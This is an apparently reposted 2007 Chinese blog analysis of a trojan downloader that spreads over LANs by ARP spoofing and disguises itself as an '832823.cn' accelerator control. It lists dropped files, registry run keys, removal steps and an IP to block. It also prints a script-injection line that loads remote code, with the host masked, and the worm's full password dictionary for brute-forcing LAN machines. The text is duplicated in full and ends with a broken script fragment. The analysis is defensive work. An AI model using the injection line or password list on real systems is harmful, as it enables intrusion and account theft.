alg.exe病毒专
"梦中情人
0
2007/10/29 
21:10 
716
作者:清新阳光 ( http://hi.baidu.com/newcenturysun)
日期:2007/10/26 (转载请保留此申明)
最近很多人反映局域网内众多电脑出现打开任何网页就出现加载832823.cn的加速器控件的症状
拿到了病毒样本,分析了一下:
这是一个木马下载器,并可以在局域网内发起arp欺骗攻击,使得中毒用户打开任意网页都会出现安装832823.cn的加速器控件。
其实这个控件是一个abc.cab的压缩包 里面TestSign.exe为病毒主体,并非所谓的网络加速器,TestSign.inf为相应安装信息
File: TestSign.exe
Size: 20080 bytes
Modified: 2007年10月23日, 12:01:12
MD5: FA0E442DC0C2E00DD3161F8F8A08B377
SHA1: B2C5A337A50FD6E6A4C7FD8EEA82EC80A5B78F8A
CRC32: B13A3B18
病毒运行后,
1.释放如下副本:
%systemroot%\system32\com\comrepl32.exe
%systemroot%\system32\config\AppEventw.cfg
%systemroot%\system32\drivers\pcibus.sys
2.添加注册表启动项目
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run下面添加
<comrepl32><%systemroot%\system32\com\comrepl32.exe> 的项目达到开机启动的目的
3.启动一个svchost.exe进程,将自身代码注入到该svchost.exe进程中,并通过svchost.exe进程下载http://*/elf_listo.txt到system32
\taimpo.txt
并读取里面的内容(里面一般为要下载的病毒文件列表)
之后下载http://*/*1.exe~http://*/*21.exe
到C:\并命名为conime.exe~conime0.exe
4.感染非系统分区下的htm/.html/.asp/.jsp/.php文件
在其后面添加<script language=javascript src=http://*/abc.js></script>的代码
5.试图以下列密码连接局域网内其他用户电脑,并可能发送类似<script language=javascript src=http://*/abc.js></script>的数据包
。(但未证实)
901100
mypass123
mypass
admin123
mypc123
mypc
love
pw123
Login
login
owner
home
zxcv
yxcv
qwer
asdf
temp123
temp
test123
test
fuck
fuckyou
root
ator
administrator
patrick
123abc
1234qwer
123123
121212
111111
alpha
2600
2003
2002
enable
godblessyou
ihavenopass
123asd
super
computer
server
123qwe
sybase
abc123
abcd
database
passwd
pass
88888888
11111111
000000
54321
654321
123456789
1234567
qq520
5201314
admin
12345
12345678
mein
letmein
2112
baseball
qwerty
7777
5150
fish
1313
shadow
1111
mustang
pussy
golf
123456
harley
6969
password
1234
当局域网中有用户中毒时,会自动执行http://*/abc.js的代码,从而下载http://*/abc.cab文件,宏观表现即为打开任何网页都会出现加载832823.cn的加速器控件的情况
上述下载的木马和病毒中几乎都是盗号木马,最后一个为机器狗病毒,该病毒可以突破还原卡并修改userinit.exe文件,使得userinit.exe成为一个新的木马下载者
上述病毒木马植入完毕后
中毒机器的sreng日志如下
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<upxdnd><%systemroot%\upxdnd.exe> []
<WinForm><%systemroot%\WinForm.exe> []
<MsIMMs32><%systemroot%\MsIMMs32.exe> []
<GenProtect><%systemroot%\GenProtect.exe> []
<cmdbcs><%systemroot%\cmdbcs.exe> []
<AVPSrv><%systemroot%\AVPSrv.exe> []
<NVDispDrv><%systemroot%\NVDispDrv.exe> []
<WinSysW><%systemroot%\swchost.exe> []
<KVP><%systemroot%\system32\drivers\svchost.exe> []
<Kvsc3><%systemroot%\Kvsc3.exe> []
<WinSysM><%systemroot%\IGM.exe> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
<comrepl32><%systemroot%\system32\com\comrepl32.exe> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{383D0D27-789F-4543-9760-D4E199623476}><%systemroot%\system32\ikewriyriu.dll> [Microsoft Corporation]
<{5BD41097-3693-4133-820E-FDAC57AF00E2}><%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys> []
<{09F8A0EB-ED61-4714-B0AD-7EAFF5361A8B}><%systemroot%\system32\zhjtrx.dll> []
==================================
正在运行的进程
[PID: 1684][%systemroot%\Explorer.exe] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys] [N/A, ]
[%systemroot%\system32\zhjtrx.dll] [N/A, ]
[%systemroot%\system32\upxdnd.dll] [N/A, ]
[%systemroot%\system32\AVPSrv.dll] [N/A, ]
[%systemroot%\system32\MsIMMs32.dll] [N/A, ]
[%systemroot%\system32\WinForm.dll] [N/A, ]
[%systemroot%\system32\Kvsc3.dll] [N/A, ]
[%systemroot%\system32\cmdbcs.dll] [N/A, ]
[%systemroot%\system32\NVDispDrv.dll] [N/A, ]
[%systemroot%\system32\GenProtect.dll] [N/A, ]
[%systemroot%\system32\ikewriyriu.dll] [Microsoft Corporation, 5.1.2600.3099]
==================================
Winsock 提供者
MSAPI Tcpip [TCP/IP]
%systemroot%\system32\sqmapi32.dll(, N/A)
MSAPI Tcpip [UDP/IP]
%systemroot%\system32\sqmapi32.dll(, N/A)
......
清除办法:
局域网中的用户如果遇到了打开任意网页都出现加载832823.cn的加速器控件的情况,需要查找相应的中毒机器。找到后可以按照如下方法进行
杀毒操作。
sreng:http://download.kztechs.com/files/sreng2.zip
一、清除病毒主程序
1.打开sreng
启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
<comrepl32><%systemroot%\system32\com\comrepl32.exe> []
2.双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提
示确定更改时,单击“是” 然后确定
删除如下文件
%systemroot%\system32\com\comrepl32.exe
%systemroot%\system32\config\AppEventw.cfg
%systemroot%\system32\drivers\pcibus.sys
二、清除病毒下载的木马(由于病毒连接的服务器上的木马几乎天天更新,所以以下方法仅供参考)
1.打开sreng
启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<upxdnd><%systemroot%\upxdnd.exe> []
<WinForm><%systemroot%\WinForm.exe> []
<MsIMMs32><%systemroot%\MsIMMs32.exe> []
<GenProtect><%systemroot%\GenProtect.exe> []
<cmdbcs><%systemroot%\cmdbcs.exe> []
<AVPSrv><%systemroot%\AVPSrv.exe> []
<NVDispDrv><%systemroot%\NVDispDrv.exe> []
<WinSysW><%systemroot%\swchost.exe> []
<KVP><%systemroot%\system32\drivers\svchost.exe> []
<Kvsc3><%systemroot%\Kvsc3.exe> []
<WinSysM><%systemroot%\IGM.exe> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{383D0D27-789F-4543-9760-D4E199623476}><%systemroot%\system32\ikewriyriu.dll> [Microsoft Corporation]
<{5BD41097-3693-4133-820E-FDAC57AF00E2}><%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys> []
<{09F8A0EB-ED61-4714-B0AD-7EAFF5361A8B}><%systemroot%\system32\zhjtrx.dll> []
系统修复 高级修复里面 选择重置winsock 重启计算机
重启后
双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示
确定更改时,单击“是” 然后确定
删除如下文件
%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys
%Program Files%\Internet Explorer\PLUGINS\NvSys74.Tao
%Program Files%\Internet Explorer\PLUGINS\NvWin75.Jmp
%systemroot%\system32\drivers\pcibus.sys
%systemroot%\system32\drivers\svchost.exe
%systemroot%\system32\AVPSrv.dll
%systemroot%\system32\cmdbcs.dll
%systemroot%\system32\djatl.dll
%systemroot%\system32\GenProtect.dll
%systemroot%\system32\gjatl.dll
%systemroot%\system32\ikewriyriu.dll
%systemroot%\system32\Kvsc3.dll
%systemroot%\system32\MsIMMs32.dll
%systemroot%\system32\msplay32.dll
%systemroot%\system32\NVDispDrv.dll
%systemroot%\system32\sqmapi32.dll
%systemroot%\system32\upxdnd.dll
%systemroot%\system32\WinForm.dll
%systemroot%\system32\wlatl.dll
%systemroot%\system32\zhjtrx.dll
%systemroot%\system32\zxatl.dll
%systemroot%\AVPSrv.exe
%systemroot%\cmdbcs.exe
%systemroot%\GenProtect.exe
%systemroot%\IGM.exe
%systemroot%\Kvsc3.exe
%systemroot%\MsIMMs32.exe
%systemroot%\NVDispDrv.exe
%systemroot%\swchost.exe
%systemroot%\upxdnd.exe
%systemroot%\WinForm.exe
%systemroot%\system32\sqmapi32.dll
2.修复被感染的html等网页文件
推荐使用CSI的iframkill
下载地址:http://www.vaid.cn/blog/read.php?9
3.建议广大网管屏蔽这个ip地址:60.190.101.206
日期:2007/10/26 (转载请保留此申明)
最近很多人反映局域网内众多电脑出现打开任何网页就出现加载832823.cn的加速器控件的症状
拿到了病毒样本,分析了一下:
这是一个木马下载器,并可以在局域网内发起arp欺骗攻击,使得中毒用户打开任意网页都会出现安装832823.cn的加速器控件。
其实这个控件是一个abc.cab的压缩包 里面TestSign.exe为病毒主体,并非所谓的网络加速器,TestSign.inf为相应安装信息
File: TestSign.exe
Size: 20080 bytes
Modified: 2007年10月23日, 12:01:12
MD5: FA0E442DC0C2E00DD3161F8F8A08B377
SHA1: B2C5A337A50FD6E6A4C7FD8EEA82EC80A5B78F8A
CRC32: B13A3B18
病毒运行后,
1.释放如下副本:
%systemroot%\system32\com\comrepl32.exe
%systemroot%\system32\config\AppEventw.cfg
%systemroot%\system32\drivers\pcibus.sys
2.添加注册表启动项目
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run下面添加
<comrepl32><%systemroot%\system32\com\comrepl32.exe> 的项目达到开机启动的目的
3.启动一个svchost.exe进程,将自身代码注入到该svchost.exe进程中,并通过svchost.exe进程下载http://*/elf_listo.txt到system32
\taimpo.txt
并读取里面的内容(里面一般为要下载的病毒文件列表)
之后下载http://*/*1.exe~http://*/*21.exe
到C:\并命名为conime.exe~conime0.exe
4.感染非系统分区下的htm/.html/.asp/.jsp/.php文件
在其后面添加<script language=javascript src=http://*/abc.js></script>的代码
5.试图以下列密码连接局域网内其他用户电脑,并可能发送类似<script language=javascript src=http://*/abc.js></script>的数据包
。(但未证实)
901100
mypass123
mypass
admin123
mypc123
mypc
love
pw123
Login
login
owner
home
zxcv
yxcv
qwer
asdf
temp123
temp
test123
test
fuck
fuckyou
root
ator
administrator
patrick
123abc
1234qwer
123123
121212
111111
alpha
2600
2003
2002
enable
godblessyou
ihavenopass
123asd
super
computer
server
123qwe
sybase
abc123
abcd
database
passwd
pass
88888888
11111111
000000
54321
654321
123456789
1234567
qq520
5201314
admin
12345
12345678
mein
letmein
2112
baseball
qwerty
7777
5150
fish
1313
shadow
1111
mustang
pussy
golf
123456
harley
6969
password
1234
当局域网中有用户中毒时,会自动执行http://*/abc.js的代码,从而下载http://*/abc.cab文件,宏观表现即为打开任何网页都会出现加载832823.cn的加速器控件的情况
上述下载的木马和病毒中几乎都是盗号木马,最后一个为机器狗病毒,该病毒可以突破还原卡并修改userinit.exe文件,使得userinit.exe成为一个新的木马下载者
上述病毒木马植入完毕后
中毒机器的sreng日志如下
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<upxdnd><%systemroot%\upxdnd.exe> []
<WinForm><%systemroot%\WinForm.exe> []
<MsIMMs32><%systemroot%\MsIMMs32.exe> []
<GenProtect><%systemroot%\GenProtect.exe> []
<cmdbcs><%systemroot%\cmdbcs.exe> []
<AVPSrv><%systemroot%\AVPSrv.exe> []
<NVDispDrv><%systemroot%\NVDispDrv.exe> []
<WinSysW><%systemroot%\swchost.exe> []
<KVP><%systemroot%\system32\drivers\svchost.exe> []
<Kvsc3><%systemroot%\Kvsc3.exe> []
<WinSysM><%systemroot%\IGM.exe> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
<comrepl32><%systemroot%\system32\com\comrepl32.exe> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{383D0D27-789F-4543-9760-D4E199623476}><%systemroot%\system32\ikewriyriu.dll> [Microsoft Corporation]
<{5BD41097-3693-4133-820E-FDAC57AF00E2}><%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys> []
<{09F8A0EB-ED61-4714-B0AD-7EAFF5361A8B}><%systemroot%\system32\zhjtrx.dll> []
==================================
正在运行的进程
[PID: 1684][%systemroot%\Explorer.exe] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys] [N/A, ]
[%systemroot%\system32\zhjtrx.dll] [N/A, ]
[%systemroot%\system32\upxdnd.dll] [N/A, ]
[%systemroot%\system32\AVPSrv.dll] [N/A, ]
[%systemroot%\system32\MsIMMs32.dll] [N/A, ]
[%systemroot%\system32\WinForm.dll] [N/A, ]
[%systemroot%\system32\Kvsc3.dll] [N/A, ]
[%systemroot%\system32\cmdbcs.dll] [N/A, ]
[%systemroot%\system32\NVDispDrv.dll] [N/A, ]
[%systemroot%\system32\GenProtect.dll] [N/A, ]
[%systemroot%\system32\ikewriyriu.dll] [Microsoft Corporation, 5.1.2600.3099]
==================================
Winsock 提供者
MSAPI Tcpip [TCP/IP]
%systemroot%\system32\sqmapi32.dll(, N/A)
MSAPI Tcpip [UDP/IP]
%systemroot%\system32\sqmapi32.dll(, N/A)
......
清除办法:
局域网中的用户如果遇到了打开任意网页都出现加载832823.cn的加速器控件的情况,需要查找相应的中毒机器。找到后可以按照如下方法进行
杀毒操作。
sreng:http://download.kztechs.com/files/sreng2.zip
一、清除病毒主程序
1.打开sreng
启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
<comrepl32><%systemroot%\system32\com\comrepl32.exe> []
2.双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提
示确定更改时,单击“是” 然后确定
删除如下文件
%systemroot%\system32\com\comrepl32.exe
%systemroot%\system32\config\AppEventw.cfg
%systemroot%\system32\drivers\pcibus.sys
二、清除病毒下载的木马(由于病毒连接的服务器上的木马几乎天天更新,所以以下方法仅供参考)
1.打开sreng
启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<upxdnd><%systemroot%\upxdnd.exe> []
<WinForm><%systemroot%\WinForm.exe> []
<MsIMMs32><%systemroot%\MsIMMs32.exe> []
<GenProtect><%systemroot%\GenProtect.exe> []
<cmdbcs><%systemroot%\cmdbcs.exe> []
<AVPSrv><%systemroot%\AVPSrv.exe> []
<NVDispDrv><%systemroot%\NVDispDrv.exe> []
<WinSysW><%systemroot%\swchost.exe> []
<KVP><%systemroot%\system32\drivers\svchost.exe> []
<Kvsc3><%systemroot%\Kvsc3.exe> []
<WinSysM><%systemroot%\IGM.exe> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{383D0D27-789F-4543-9760-D4E199623476}><%systemroot%\system32\ikewriyriu.dll> [Microsoft Corporation]
<{5BD41097-3693-4133-820E-FDAC57AF00E2}><%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys> []
<{09F8A0EB-ED61-4714-B0AD-7EAFF5361A8B}><%systemroot%\system32\zhjtrx.dll> []
系统修复 高级修复里面 选择重置winsock 重启计算机
重启后
双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示
确定更改时,单击“是” 然后确定
删除如下文件
%Program Files%\Internet Explorer\PLUGINS\NvSys74.Sys
%Program Files%\Internet Explorer\PLUGINS\NvSys74.Tao
%Program Files%\Internet Explorer\PLUGINS\NvWin75.Jmp
%systemroot%\system32\drivers\pcibus.sys
%systemroot%\system32\drivers\svchost.exe
%systemroot%\system32\AVPSrv.dll
%systemroot%\system32\cmdbcs.dll
%systemroot%\system32\djatl.dll
%systemroot%\system32\GenProtect.dll
%systemroot%\system32\gjatl.dll
%systemroot%\system32\ikewriyriu.dll
%systemroot%\system32\Kvsc3.dll
%systemroot%\system32\MsIMMs32.dll
%systemroot%\system32\msplay32.dll
%systemroot%\system32\NVDispDrv.dll
%systemroot%\system32\sqmapi32.dll
%systemroot%\system32\upxdnd.dll
%systemroot%\system32\WinForm.dll
%systemroot%\system32\wlatl.dll
%systemroot%\system32\zhjtrx.dll
%systemroot%\system32\zxatl.dll
%systemroot%\AVPSrv.exe
%systemroot%\cmdbcs.exe
%systemroot%\GenProtect.exe
%systemroot%\IGM.exe
%systemroot%\Kvsc3.exe
%systemroot%\MsIMMs32.exe
%systemroot%\NVDispDrv.exe
%systemroot%\swchost.exe
%systemroot%\upxdnd.exe
%systemroot%\WinForm.exe
%systemroot%\system32\sqmapi32.dll
2.修复被感染的html等网页文件
推荐使用CSI的iframkill
下载地址:http://www.vaid.cn/blog/read.php?9
3.建议广大网管屏蔽这个ip地址:60.190.101.206
收藏本文到网摘:
.text:''):(d.getSelection?d.getSelection():'');void(keyit=window.open('http://my.poco.cn/fav/storeIt.php?t='+escape(d.title)+'&u='+escape(d.location.href)+'&c='+escape(t)+'&img=http://www.h-strong.com/blog/logo.gif','keyit','scrollbars=no,width=475,height=575,left=50,top=50status=no,resizable=yes'));keyit.focus();){kind=logo}
